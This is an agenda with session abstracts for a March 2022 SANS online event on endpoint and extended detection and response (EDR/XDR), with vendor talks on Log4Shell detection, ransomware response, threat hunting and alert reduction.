Agenda | March 25, 2022 | 10:30 AM - 3:30 PM EDT
Welcome & Opening Remarks
Matthew Bromiley, SANS Instructor & Subject Matter Expert
Cross Data Source Detections – Real World Scenario from the Log4Shell Attack
After the Log4Shell vulnerability was announced, Hunters researched the vulnerability and relevant exploitations in order to surface servers at potential risk and hunt for exploitation attempts, as well as to develop detection methods that can detect the exploitation of Log4Shell. Given that Log4j is used in a wide range of consumer and enterprise websites, services, and applications, we first assessed our own systems and then took measures to identify potential vulnerabilities or attacks for our customers, creating a visibility dashboard and Analytics within the Hunters platform. We will show how Hunters built new detections for Log4Shell, adding an extra layer of protection for the security teams who work with us.
Actionable Takeaways: Deeper understanding of how attacks can be missed in SIEM and other environments How cross data source detection works to improve detection efficiency How this approach worked with Log4Shell detection How Hunters built new detections for Log4Shell, adding an extra layer of protection.
XDR: the Blueprint for Solving the Ransomware Challenge
During a ransomware attack, it is critical to detect and respond early and quickly. By decreasing your mean time to detection in identifying the attacker’s behavior, your security team can quickly investigate and respond timely to prevent a ransomware incident. To protect against a ransomware incident, it is important to interrupt the kill chain as early as possible. One way to make it radically simple and fast is to harness the power of XDR (extended Detection and Response).
Join Cisco as we discuss and demonstrate the three key pillars of XDR and the critical role they play in helping you achieve better security outcomes.
Beat the Clock: How to Accelerate Threat Hunting With XDR
To carry out the most efficient threat hunts, defenders need multiple sources of telemetry and a simply way of acquiring and analyzing data from all of them. Join this session to hear the differences between XDR and SIEM-based threat hunts and learn how XDR can reduce the amount of time to detect and respond to potential threats. We’ll cover best practices and cautions from real world experiences, as well as preventative measures and investigations that you can start today.
Andrew Mundell, Enterprise Security Engineer, Sophos
Solving for X with XDR: Widening the Aperture for Rapid Detection, Investigation and Response
There has been a lot of buzz around Extended Detection and Response (XDR) as an evolution of Endpoint Detection and Response (EDR), however definitions vary depending on who you talk to. Given the dramatic changes to network architectures as organizations move workloads to the cloud, leverage disparate SaaS tools, while also still relying on traditional on-premise networks has increased data volumes and the complexity of detecting threats across these environments.
In this session we will discuss the evolution of security from the endpoint and beyond, from legacy anti-virus, to EDR and now XDR. We will show how detection use cases and workflows that used to require complex and manually configured SIEM and SOAR solutions can be automated and streamlined with XDR, for rapid detection, investigation and response.
Ken Westin, Director of Security Strategy, Cybereason
EDR & XDR – How to Reduce Alerts & Speed Up Investigation
Security teams are overwhelmed. And EDRs are too noisy. With a finite number of hours in the day and a limited amount of resources, it's a daily challenge to validate the vast number of alerts coming into the organization. One source of these alerts are EDR systems. And since EDR is turning into XDR, the number of alerts is only increasing.
Advancements in EDR technology have improved detection rates over the past several years. This is a good thing! But increased detection rates and alerts do not come without their trade-offs.
Any level of manual investigation for every alert coming in from an EDR/XDR system puts a strain on the security organization.
Andrey Voitenko, CISSP Senior Product Manager, VMRay
Top 3 Endpoint Attacks Ripped from the Headlines
Adversaries keep devising new ways to compromise endpoints. To thwart them, you need the best-in-class endpoint security that's always learning to outpace threats. Attend this session to understand the latest endpoint threats seen and analyzed by the Palo Alto Networks research team.
During this session, we will discuss:
• Recent attacks like Log4Shell and HermeticWiper
Aviad Meyer, Security Research Manager, Palo Alto Networks
Automate Vulnerability Remediation and Reduce EDR Alerts
EDR solutions are tremendously powerful tools and represent the next generation in endpoint security. Come learn how cloud-native IT operations for modern organizations helps realize outcomes over alerts and avoid the dreaded alert fatigue common with highly sensitive EDR tools today. See how our tool combined with an EDR solution can keep all your endpoints configured and secured, anywhere in the world. With Automox + EDR, SecOps teams can have a recognizable impact on company success – and sleep better at night knowing their environment is secure.
Jay Goodman, Director, Product Marketing Group, Automox
Wrap-Up and Closing Remarks
Matt Bromiley, SANS Instructor & Subject Matter Expert